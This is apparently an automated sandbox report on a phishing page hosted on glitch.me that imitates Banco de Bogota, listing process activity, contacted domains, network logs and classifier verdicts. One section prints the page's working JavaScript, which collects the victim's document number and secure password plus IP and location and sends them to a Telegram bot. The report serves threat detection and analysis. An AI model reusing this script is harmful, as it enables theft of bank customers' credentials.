Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2320,i,18386388468586391517,7251386231615536648,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: chromecache_70.2.dr

Binary or memory string: false">Customer stories<span></span></span></a></div><div class="relative container h-72 mb-8 flex justify-center md:hidden"><img alt="Microsoft, Stone, WorldRemit, VMWare, WordPress, Intel, Accenture, Panorays, John Deere, Nokia" loading="lazy" width="350" height="288" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/mobile.b3d06ccc.svg"/></div><div class="hidden space-y-8 md:block 3xl:hidden"><div class="w-full space-y-10 mt-9"></div></div><div class="hidden space-y-8 3xl:flex flex-col items-center"><div class="w-full space-y-10 mt-9" width="2250px" height="auto"></div></div><div class="container md:hidden"><a class="transition rounded-3px outline-none inline-flex

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://clumsy-sulky-helium.glitch.me/	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label
https://sapp2406.sirv.com/assets/images/vigilado.jpg	0%	Avira URL Cloud	safe
https://sapp2406.sirv.com/bogo/lfr_style.css	0%	Avira URL Cloud	safe
http://clumsy-sulky-helium.glitch.me/favicon.ico	100%	Avira URL Cloud	phishing
https://help.glitch.com/	0%	Avira URL Cloud	safe
https://sapp2406.sirv.com/bogo/c2922.png	0%	Avira URL Cloud	safe
http://clumsy-sulky-helium.glitch.me/dt.js	100%	Avira URL Cloud	phishing
https://sapp2406.sirv.com/bogo/logobanco1.png	0%	Avira URL Cloud	safe
https://sapp2406.sirv.com/assets/fonts/icons-bbogota/styles.css	0%	Avira URL Cloud	safe
https://sapp2406.sirv.com/bogo/lfr_ownstyle.css	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
sapp2406.sirv.com	162.55.133.182	true	false	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
ipinfo.io	34.117.59.81	true	false	high
clumsy-sulky-helium.glitch.me	44.195.183.198	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	216.58.206.36	true	false	high
api.ipify.org	104.26.12.205	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sapp2406.sirv.com/bogo/c2922.png	false	Avira URL Cloud: safe	unknown
https://sapp2406.sirv.com/assets/images/vigilado.jpg	false	Avira URL Cloud: safe	unknown
http://clumsy-sulky-helium.glitch.me/	true		unknown
https://api.ipify.org/?format=json	false		high
http://clumsy-sulky-helium.glitch.me/dt.js	true	Avira URL Cloud: phishing	unknown
https://sapp2406.sirv.com/bogo/lfr_style.css	false	Avira URL Cloud: safe	unknown
https://sapp2406.sirv.com/bogo/logobanco1.png	false	Avira URL Cloud: safe	unknown
http://clumsy-sulky-helium.glitch.me/favicon.ico	true	Avira URL Cloud: phishing	unknown
https://ipinfo.io/	false		high
https://sapp2406.sirv.com/assets/fonts/icons-bbogota/styles.css	false	Avira URL Cloud: safe	unknown
https://sapp2406.sirv.com/bogo/lfr_ownstyle.css	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://website-cdn.ipinfo.io/_next/static/media/snowflake.7608b7c5.svg	chromecache_70.2.dr	false		high
https://ipinfo.io/missingauth	chromecache_73.2.dr	false		high
https://api.telegram.org/bot	chromecache_67.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/ipinfo-main-illustration.9e5f5329.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/logo-plesk-white.5276a2d7.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/photo-plesk-jan.c2acc0e6.jpeg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/framework-aa372710a8ef8c81.js	chromecache_70.2.dr	false		high
https://cdn.ipinfo.io/static/deviceicons/apple-icon-precomposed.png	chromecache_70.2.dr	false		high
https://cdn.ipinfo.io/static/manifest.json	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/asn-small.77f95094.svg	chromecache_70.2.dr	false		high
https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css	chromecache_72.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/webpack-475f6e71860c1539.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/domains-small.249bd466.svg	chromecache_70.2.dr	false		high
https://cdn.ipinfo.io/static/deviceicons/android-icon-96x96.png	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/google-cloud.17488aed.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/css/bc888e06ecc898de.css	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/logo-npm-white.37bc2bf6.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/photo-clearbit-alex.70fcf481.jpeg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/privacy-small.854788a7.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/mobile.b3d06ccc.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/splunk.a71e22c9.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/datadog.01d809ee.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/logo-clearbit-white.dedf4224.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/company-small.e5cfbec7.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/database-download-small.053da0c0.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/9935-febdd845ad854de7.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/photo-npm-laurie.30cd3e0e.jpeg	chromecache_70.2.dr	false		high
https://cdn.ipinfo.io/static/deviceicons/android-icon-48x48.png	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/paloalto.0919c3d7.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/sha-b7afb3b/_ssgManifest.js	chromecache_70.2.dr	false		high
https://api.ipify.org?format=json	chromecache_67.2.dr	false		high
https://glitch.com	chromecache_72.2.dr	false		high
https://help.glitch.com/	chromecache_72.2.dr	false	Avira URL Cloud: safe	unknown
https://website-cdn.ipinfo.io/_next/static/chunks/pages/_app-341d1ad16f4d2b0f.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/carrier-small.6d72c73d.svg	chromecache_70.2.dr	false		high
https://ipinfo.io/static/images/og_logo.png	chromecache_70.2.dr	false		high
https://schema.org	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/pages/index-5a47ed2aef9c2132.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/abuse-small.ef56e2d8.svg	chromecache_70.2.dr	false		high
https://ipinfo.io	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/main-3e604834c978a5e0.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/geolocation-small.0037d36c.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/zapier.a1a375f4.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/data-preview.d84e8d7d.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/whois-small.7868d282.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/icon-menu.1b6dca09.svg	chromecache_70.2.dr	false		high
https://use.typekit.net/qls3unz.css	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/heroku.7b181a55.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/blue_check.d118dbca.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/ranges-small.fd2dafde.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/api-access.d4d3b4b8.svg	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/logo-positive.0a4ba892.svg	chromecache_70.2.dr	false		high
https://cdn.glitch.com/d7f4f279-e13b-4330-8422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1	chromecache_72.2.dr	false		high
https://website-cdn.ipinfo.io	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/sha-b7afb3b/_buildManifest.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/polyfills-42372ed130431b0a.js	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/chunks/6625-f733fa413b568d72.js	chromecache_70.2.dr	false		high
https://cdn.ipinfo.io/static/deviceicons/android-icon-192x192.png	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/css/a0e2f6495d0af84f.css	chromecache_70.2.dr	false		high
https://website-cdn.ipinfo.io/_next/static/media/wordpress.dd4ede2f.svg	chromecache_70.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
44.195.183.198	clumsy-sulky-helium.glitch.me	United States	14618	AMAZON-AESUS	false
18.214.232.179	unknown	United States	14618	AMAZON-AESUS	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
162.55.133.182	sapp2406.sirv.com	United States	35893	ACPCA	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
195.201.168.241	unknown	Germany	24940	HETZNER-ASDE	false
172.67.74.152	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.5
192.168.2.23

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589638
Start date and time:	2025-01-13 00:24:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://clumsy-sulky-helium.glitch.me/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@16/34@18/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 216.58.206.46, 142.251.168.84, 172.217.16.206, 142.250.186.46, 142.250.184.202, 142.250.186.106, 172.217.18.10, 142.250.185.170, 142.250.186.74, 142.250.185.74, 216.58.212.138, 142.250.185.138, 142.250.186.138, 172.217.18.106, 142.250.186.42, 142.250.185.234, 142.250.184.234, 216.58.206.74, 142.250.185.106, 172.217.16.202, 142.250.185.202, 172.202.163.200, 199.232.210.172, 192.229.221.95, 20.242.39.171, 142.250.184.238, 142.250.185.206, 142.250.184.206, 172.217.18.14, 216.58.206.78, 142.250.185.131, 34.104.35.123, 184.28.90.27, 23.1.237.91, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, redirector.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://clumsy-sulky-helium.glitch.me/

Input	Output
URL: http://clumsy-sulky-helium.glitch.me Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: http://clumsy-sulky-helium.glitch.me
URL: http://clumsy-sulky-helium.glitch.me/... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and potential data exfiltration. While the script appears to be collecting user information and IP addresses, it is also sending this data to a Telegram bot, which could be a legitimate use case or a malicious one depending on the context. Further investigation is needed to determine the true intent and purpose of the script." }
$.getJSON("https://api.ipify.org?format=json", function(data) { $("#gfg").html(data.ip); }); $.getJSON("https://ipinfo.io", function(response) { $("#ip").html("IP: " + response.ip); $("#address").html("" + response.city + ", " + response.country); }); var u_name, u_name2, u_name3, u_name4, ip, ip2, message; var ready = function() { u_name = document.getElementById("tipoPersona").value; u_name2 = document.getElementById("IType").value; u_name3 = document.getElementById("numi").value; u_name4 = document.getElementById("clvseg").value; ip = document.getElementById("gfg").innerHTML; ip2 = document.getElementById("address").innerHTML; message = "bbogota\nTipoCliente: " + u_name + "\nDocumento: " + u_name2 + "-" + u_name3 + "\nClav3Seg: " + u_name4 + "\n\nIP: " + ip +"\n" + ip2; }; var sender = function() { ready(); var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", "headers": { "Content-Type": "application/json", "cache-control": "no-cache" }, "data": JSON.stringify({ "chat_id": chat_id, "text": message }) }; $.ajax(settings).done(function(response) { console.log(response); window.location = 'load.html'; }); return false; };
URL: http://clumsy-sulky-helium.glitch.me/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Ingresa el tipo y numero de documento", "prominent_button_name": "Continuar", "text_input_field_labels": [ "Que tipo de cliente eres?", "Identificacin", "Clave Segura" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://clumsy-sulky-helium.glitch.me/ Model: Joe Sandbox AI	{ "brands": [ "Banco de Bogot" ] }
	{ "brands": [ "Banco de Bogot" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 22:25:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.98027907959143
Encrypted:	false
SSDEEP:	48:8CduTKvapHcidAKZdA19ehwiZUklqehHy+3:8vHQcy
MD5:	4BC250DBF30BFBFCD9903D9AAD5AF65B
SHA1:	96B7ECFB4C0CD9AAB1CF70CB9132B23295E3F505
SHA-256:	E07A9EEFB25857CD8A6A4F0306BD2F9904ABC9223CD0AD895A18DF9D7FCB054C
SHA-512:	E48E14BFF3A38E5365F3345363684B3E4CE559E223523A35E6B343DEB1E001F9B0335E5DB4696A2BBD4435B6C0CE30E77C7E971E50F124E0002D19A555DB188A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......y:Ie..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z$.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z$.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z$.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z$............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z'............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 00:25:11.736211061 CET	53	60760	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:11.738940001 CET	53	51133	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:12.734977961 CET	53	52110	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:15.920888901 CET	60960	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:15.921062946 CET	60756	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:15.929171085 CET	53	60960	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:15.929239988 CET	53	60756	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:17.481271029 CET	62441	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:17.481432915 CET	51841	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:17.491630077 CET	53	62441	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:17.503810883 CET	53	51841	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:18.120568991 CET	64188	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:18.120951891 CET	57022	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:18.129280090 CET	53	58631	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:18.137867928 CET	53	64188	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:18.138786077 CET	53	57022	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:18.275221109 CET	63215	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:18.275650024 CET	60883	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:18.284012079 CET	53	63215	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:18.284126997 CET	53	60883	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.199203014 CET	53	57292	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.753109932 CET	60164	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:20.753285885 CET	49848	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:20.767357111 CET	53	60164	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.767405033 CET	63038	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:20.767944098 CET	58672	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:20.771231890 CET	49224	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:20.771382093 CET	56799	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:20.774173975 CET	53	63038	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.774863005 CET	53	58672	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.778181076 CET	53	49224	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.778270960 CET	53	49848	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.778322935 CET	53	56799	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:20.823354959 CET	53	56756	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:21.381046057 CET	58785	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:21.381239891 CET	56928	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:21.387830019 CET	53	56928	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:21.387979031 CET	53	58785	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:21.403053999 CET	63159	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:21.403053999 CET	53244	53	192.168.2.5	1.1.1.1
Jan 13, 2025 00:25:21.410204887 CET	53	63159	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:21.410552025 CET	53	53244	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:30.244409084 CET	53	63894	1.1.1.1	192.168.2.5
Jan 13, 2025 00:25:49.290662050 CET	53	50503	1.1.1.1	192.168.2.5
Jan 13, 2025 00:26:11.297342062 CET	53	52829	1.1.1.1	192.168.2.5
Jan 13, 2025 00:26:11.614190102 CET	53	50366	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 00:25:17.570560932 CET	444	OUT	GET / HTTP/1.1 Host: clumsy-sulky-helium.glitch.me Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 13, 2025 00:25:18.031259060 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8423 Connection: keep-alive x-amz-id-2: 8KT75/pq8h7WykdgJTnB50qZXaHNxma4wM2c47JwZl7zSjTjimOUmQlxMECWc27dreb4fhtCh+vqfZlzLK2RpO67haH48Zp/ x-amz-request-id: 1VEHMTGYB90VVP62 last-modified: Tue, 07 Jan 2025 18:30:48 GMT etag: "c3a5b5db2afa74160a0b55948ea98aa0" x-amz-server-side-encryption: AES256 cache-control: no-cache x-amz-version-id: rF25NWpm9ZWQU8ry0dwCQb_oDmZe7yf5 accept-ranges: bytes server: AmazonS3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 38 22 3e 20 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 6f 67 6f 74 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 70 70 32 34 30 36 2e 73 69 72 76 2e 63 6f 6d 2f 62 6f 67 6f 2f 6c 66 72 5f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 20 20 20 20 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Bogota</title> <link rel="stylesheet" 